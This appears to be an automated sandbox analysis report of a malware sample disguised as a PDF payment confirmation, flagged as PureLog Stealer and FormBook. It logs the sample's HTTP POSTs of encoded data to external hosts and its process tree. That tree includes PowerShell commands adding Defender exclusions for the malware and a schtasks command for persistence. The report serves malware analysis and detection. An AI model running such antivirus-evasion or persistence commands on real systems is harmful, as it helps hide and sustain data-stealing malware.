                                                                      Data Ascii: d0s=TNOBb8Vc8TRj4OcuIBlctMdAJVvVVqQdDYDgIPjmqt0QbDNPiIDapt7i/eGhgYhgBBEeQR4Na+V8nCGRrCJ5lqa7zfkuks8/LNbEwK0B5pVaEmjOmTYXQ1c3dDdKmwUem6wh5+ZlJOuM14FY8dmIDuowpOCRKsdO6GrvzFDOEFImoyBMZvy0K214BBgtzd4I0EbF5CP5JqUyuYG3+cHToSZbmf7J6arH7av0WBurPO68w/VygL0xs/ajp+vg90UfMqUX/hKGMjUOrTN8MRVvkI4COOLVfo+OeRmQVYJyLq5LDk5axPrfvjbmnwNSJRzygsNzv3k0IXzyJJBdc6QdK5Kv80NuxGQjAudIqmM5JMjeixCcPL8rrK2TplnFZBTnSHqmBOobk/Ezu63jZQ9EzJawnTALbpa28iHE9utR287E7/7TJxAYXyZb41A4s25wUnXtDOERw3H3YROLVHwKt5NRv8HQLnW3vaF8h/aWhW0ZQShgaUNZl8URZ+KzLLfmwNW6BlA1zXwCFI4D8XliFQC5rJ4CHkOuoTkGvl+KFoGu+kVeMJpYtG4cMQjqKdmyYMbZf6mfVm7sWKgBPo5mfeDbOaboWV5X8EwQowuVEvl0l9HQi2VVT4AF/ZWugZoVulxmGIMXxEAcEGCQzuYszPVfJJ021SwDZC5qlAsaKUJ9m86B12kG96pu8T8RKLyYmYH1AxTQme+M/1Ng2xrLaOwnyoYDMDwal13H7bFLlHTKau9eXCvgPibXi7kxXl4+dm0Uzqi1AVzluFB98nUrAxesNbUbmmchV9ytnNbpZVhEsBng44CnIY4x+FSnpAhU6twJ/Dskcn5XCasjErye+dUTlLYXxAaI2sH+jRB04izW5t0LyiyWhDgFeKDe0IvFaie1OVeL9u4ceDlnYD8XoX6UOeyheWfJkmESQmhaZykiS8wwjK+fOpbGcmqR0NvhIQn/LI8j8fIFn5i+ozHM87MURulFIaCVTt0aG8ETquf3rBU1 [TRUNCATED]
                                                                      Nov 27, 2024 08:56:07.989901066 CET767INHTTP/1.1 403 Forbidden
                                                                      Server: Beaver
                                                                      Cache-Control: no-cache
                                                                      Content-Type: text/html
                                                                      Content-Length: 635
                                                                      Connection: close
                                                                      Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 [TRUNCATED]
                                                                      Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000004252206681"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      12192.168.2.749970120.26.240.121802340C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 27, 2024 08:56:09.064431906 CET539OUTGET /xzte/?Zvd8B=gHrX0lXPMBRt-RA&d0s=ePmhYLVm9S1AwYpTTSZKid9qIij+VYAwULrAeuLQsL02UG94i7HF88rql5COv5lAGhM5DGM0WOZgiTSBkG1OtvSk7+4ip8l/BrXN3KBdu4QudzDN3iYKRjIRKyxXuTAVz68t7cV2ONOD HTTP/1.1
                                                                      Host: www.buckser.info
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                      Accept-Language: en-US
                                                                      Connection: close
                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                      Nov 27, 2024 08:56:10.624063969 CET767INHTTP/1.1 403 Forbidden
                                                                      Server: Beaver
                                                                      Cache-Control: no-cache
                                                                      Content-Type: text/html
                                                                      Content-Length: 635
                                                                      Connection: close
                                                                      Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 [TRUNCATED]
                                                                      Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000004252206681"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      13192.168.2.749988209.74.77.108802340C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 27, 2024 08:56:16.520050049 CET804OUTPOST /4wqa/ HTTP/1.1
                                                                      Host: www.innovateideas.xyz
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US
                                                                      Origin: http://www.innovateideas.xyz
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Cache-Control: no-cache
                                                                      Content-Length: 216
                                                                      Connection: close
                                                                      Referer: http://www.innovateideas.xyz/4wqa/
                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                      Data Raw: 64 30 73 3d 6a 71 74 39 39 4d 6a 57 5a 56 32 6d 78 2b 2f 47 57 2b 4f 4b 43 59 79 2b 74 6e 63 76 2b 2f 58 2b 68 72 71 34 73 70 44 64 57 68 67 36 30 34 44 75 54 7a 41 51 41 75 64 58 63 66 50 30 61 61 46 41 50 69 65 34 76 77 6d 78 4e 6d 6f 47 43 78 52 42 6b 5a 41 34 2b 6e 4a 2f 79 63 4b 53 49 59 4f 4c 44 33 73 34 68 73 53 55 68 31 59 2b 77 55 4b 57 38 31 57 78 6a 55 33 59 78 42 78 64 6d 68 6b 7a 4e 52 76 47 33 58 64 52 53 4b 79 50 58 55 59 57 6c 6a 72 55 66 4a 36 77 76 66 52 2f 6c 65 6f 72 43 46 6a 6a 7a 46 77 30 4b 30 5a 73 73 75 4e 35 66 4e 36 71 57 52 41 52 48 44 43 53 72 7a 52 66 59 66 6f 78 51 72 45 6c 42 78 2b 62 4d 70 64 71 53 77 3d 3d
                                                                      Data Ascii: d0s=jqt99MjWZV2mx+/GW+OKCYy+tncv+/X+hrq4spDdWhg604DuTzAQAudXcfP0aaFAPie4vwmxNmoGCxRBkZA4+nJ/ycKSIYOLD3s4hsSUh1Y+wUKW81WxjU3YxBxdmhkzNRvG3XdRSKyPXUYWljrUfJ6wvfR/leorCFjjzFw0K0ZssuN5fN6qWRARHDCSrzRfYfoxQrElBx+bMpdqSw==
                                                                      Nov 27, 2024 08:56:17.723216057 CET533INHTTP/1.1 404 Not Found
                                                                      Date: Wed, 27 Nov 2024 07:56:17 GMT
                                                                      Server: Apache
                                                                      Content-Length: 389
                                                                      Connection: close
                                                                      Content-Type: text/html
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      14192.168.2.749996209.74.77.10880
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 27, 2024 08:56:21.181942940 CET824OUTPOST /4wqa/ HTTP/1.1
                                                                      Host: www.innovateideas.xyz
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US
                                                                      Origin: http://www.innovateideas.xyz
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Cache-Control: no-cache
                                                                      Content-Length: 236
                                                                      Connection: close
                                                                      Referer: http://www.innovateideas.xyz/4wqa/
                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                      Data Raw: 64 30 73 3d 6a 71 74 39 39 4d 6a 57 5a 56 32 6d 77 65 76 47 55 64 6d 4b 54 6f 79 39 6f 6e 63 76 6c 76 58 36 68 72 6d 34 73 74 37 4e 57 79 45 36 74 5a 7a 75 53 78 6f 51 42 75 64 58 58 2f 50 39 55 36 46 66 50 69 53 77 76 78 71 78 4e 6d 38 47 43 30 74 42 6b 6f 41 33 73 48 4a 39 70 4d 4b 71 56 6f 4f 4c 44 33 73 34 68 73 57 36 68 31 51 2b 78 6b 36 57 36 57 4f 79 70 30 33 58 35 68 78 64 74 42 6b 76 4e 52 76 34 33 57 52 2f 53 4a 4b 50 58 56 49 57 6c 79 72 56 4d 70 36 32 78 76 52 75 6d 73 74 43 61 57 4c 41 7a 57 45 64 41 54 55 54 70 59 4d 62 46 76 32 47 49 41 34 71 44 42 6d 6b 38 56 4d 71 61 65 73 70 64 4a 77 45 65 47 62 78 42 37 38 75 45 46 42 31 65 4c 73 42 37 6d 49 52 61 59 78 7a 51 6e 77 32 52 54 73 3d
                                                                      Data Ascii: d0s=jqt99MjWZV2mwevGUdmKToy9oncvlvX6hrm4st7NWyE6tZzuSxoQBudXX/P9U6FfPiSwvxqxNm8GC0tBkoA3sHJ9pMKqVoOLD3s4hsW6h1Q+xk6W6WOyp03X5hxdtBkvNRv43WR/SJKPXVIWlyrVMp62xvRumstCaWLAzWEdATUTpYMbFv2GIA4qDBmk8VMqaespdJwEeGbxB78uEFB1eLsB7mIRaYxzQnw2RTs=
                                                                      Nov 27, 2024 08:56:22.397032022 CET533INHTTP/1.1 404 Not Found
                                                                      Date: Wed, 27 Nov 2024 07:56:22 GMT
                                                                      Server: Apache
                                                                      Content-Length: 389
                                                                      Connection: close
                                                                      Content-Type: text/html
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      15192.168.2.749997209.74.77.10880
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 27, 2024 08:56:23.851372957 CET1837OUTPOST /4wqa/ HTTP/1.1
                                                                      Host: www.innovateideas.xyz
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US
                                                                      Origin: http://www.innovateideas.xyz
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Cache-Control: no-cache
                                                                      Content-Length: 1248
                                                                      Connection: close
                                                                      Referer: http://www.innovateideas.xyz/4wqa/
                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                      Data Raw: 64 30 73 3d 6a 71 74 39 39 4d 6a 57 5a 56 32 6d 77 65 76 47 55 64 6d 4b 54 6f 79 39 6f 6e 63 76 6c 76 58 36 68 72 6d 34 73 74 37 4e 57 79 4d 36 78 2b 62 75 54 58 67 51 43 75 64 58 4d 66 50 34 55 36 46 57 50 69 61 30 76 78 32 4c 4e 6b 45 47 42 57 56 42 74 38 73 33 6e 48 4a 39 32 63 4b 52 49 59 4f 53 44 33 64 51 68 73 47 36 68 31 51 2b 78 6d 79 57 74 56 57 79 36 6b 33 59 78 42 77 4a 6d 68 6b 54 4e 52 57 44 33 57 56 42 53 5a 71 50 58 31 34 57 6a 41 54 56 50 4a 36 30 77 76 51 7a 6d 74 52 5a 61 57 58 4d 7a 58 77 7a 41 55 59 54 6f 35 78 57 5a 2b 47 52 57 79 38 55 46 7a 75 68 36 54 4d 2f 63 4d 63 54 59 4b 64 67 44 55 50 6f 4e 4a 63 2f 42 78 4e 31 49 4e 55 4b 69 45 38 6c 5a 4f 49 58 43 6c 67 73 49 55 6a 36 75 44 37 66 5a 61 45 57 49 48 4f 59 57 36 77 63 6d 30 6f 32 69 6f 66 6c 49 45 70 74 4b 78 65 45 4b 4e 76 45 6b 38 6f 4d 56 70 58 4c 49 43 55 43 76 64 6b 67 53 46 6e 71 4d 62 6d 71 73 48 65 61 37 4a 78 41 77 5a 2f 55 65 66 4d 61 62 74 4f 66 79 36 38 47 5a 67 36 38 46 6f 32 54 59 30 31 2b 51 69 72 55 70 75 [TRUNCATED]
                                                                      Data Ascii: d0s=jqt99MjWZV2mwevGUdmKToy9oncvlvX6hrm4st7NWyM6x+buTXgQCudXMfP4U6FWPia0vx2LNkEGBWVBt8s3nHJ92cKRIYOSD3dQhsG6h1Q+xmyWtVWy6k3YxBwJmhkTNRWD3WVBSZqPX14WjATVPJ60wvQzmtRZaWXMzXwzAUYTo5xWZ+GRWy8UFzuh6TM/cMcTYKdgDUPoNJc/BxN1INUKiE8lZOIXClgsIUj6uD7fZaEWIHOYW6wcm0o2ioflIEptKxeEKNvEk8oMVpXLICUCvdkgSFnqMbmqsHea7JxAwZ/UefMabtOfy68GZg68Fo2TY01+QirUpuUj8ceVIrDkcWEwNS1XUOxrp8WVHmrB+iouOd82ZQfSdiu5myCmMtMRFMHLQunjT7NOg4czE96Zprq7qeHgmgttmzfn9J4lDI0D335naQBb6yJ4EQofsn3zi1rIEFgKq8tjXvB8TVavQGZpAUNhhzqOTWiG381aBZxjJ3qytO7az9JM8efCnMqgFp1CIXeZEPo99PjPm5oJLRK1AzIhlghmlpt0b7PEQoot2futHn22Oj7/DOBCTLEJV6S/SkTboVi+ZbwRBT6Q7uMyrMipFJHY69yxp86AFcmp0wAkQ4ufptA87JekSNyKZF441f9c0DMjgnf1t6f9snNze7Z6D7WpMCuNsagVGofF5x2u2CdF1FmizzgkwaluaYgf0ZMLxk6hejakj0+qQtkcT5vIg+eAcyBx9udyRd4PPDfLmuOsCjRbtMzhFwB37DyCXT7NtByvd30Oj4Czi9ov1Tet6zXYNSyo3Lzfrk5EPm1lNrxiCtPmtmhkU2A/oJQfIRBaGDpdPcZYNW5lexS+LYP0H7DDzV3jbvLx3hxpzuS3b6LtOvHZXonadsC1Y0oP4qODMYBjymo5GenyUW8Xl5vQQFvGv29ElR8+vJt+AknedHfga+N8yMHEcUNawuAEJZHlymb52s0AMQ449R5ba/3Etmo2RTx8icf0lNAZ [TRUNCATED]
                                                                      Nov 27, 2024 08:56:25.102813959 CET533INHTTP/1.1 404 Not Found
                                                                      Date: Wed, 27 Nov 2024 07:56:24 GMT
                                                                      Server: Apache
                                                                      Content-Length: 389
                                                                      Connection: close
                                                                      Content-Type: text/html
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                      Click to jump to process

                                                                      Click to jump to process

                                                                      Click to dive into process behavior distribution

                                                                      Click to jump to process

                                                                      Target ID:0
                                                                      Start time:02:54:11
                                                                      Start date:27/11/2024
                                                                      Path:C:\Users\user\Desktop\Payment_Confirmation_pdf.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Desktop\Payment_Confirmation_pdf.exe"
                                                                      Imagebase:0xc50000
                                                                      File size:861'704 bytes
                                                                      MD5 hash:DBB00CEAC5C3C668BDBB0C91DF825BE7
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1427083355.0000000004129000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1427083355.0000000004145000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1429337605.0000000005BC0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      Target ID:4
                                                                      Start time:02:54:18
                                                                      Start date:27/11/2024
                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment_Confirmation_pdf.exe"
                                                                      Imagebase:0x3d0000
                                                                      File size:433'152 bytes
                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:5
                                                                      Start time:02:54:19
                                                                      Start date:27/11/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff75da10000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:6
                                                                      Start time:02:54:19
                                                                      Start date:27/11/2024
                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cQwRvD.exe"
                                                                      Imagebase:0x3d0000
                                                                      File size:433'152 bytes
                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:7
                                                                      Start time:02:54:19
                                                                      Start date:27/11/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff75da10000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:8
                                                                      Start time:02:54:19
                                                                      Start date:27/11/2024
                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\cQwRvD" /XML "C:\Users\user\AppData\Local\Temp\tmp6A84.tmp"
                                                                      Imagebase:0xb50000
                                                                      File size:187'904 bytes
                                                                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:9
                                                                      Start time:02:54:19
                                                                      Start date:27/11/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff75da10000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:10
                                                                      Start time:02:54:20
                                                                      Start date:27/11/2024
                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                      Imagebase:0x8f0000
                                                                      File size:45'984 bytes
                                                                      MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.1652562579.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
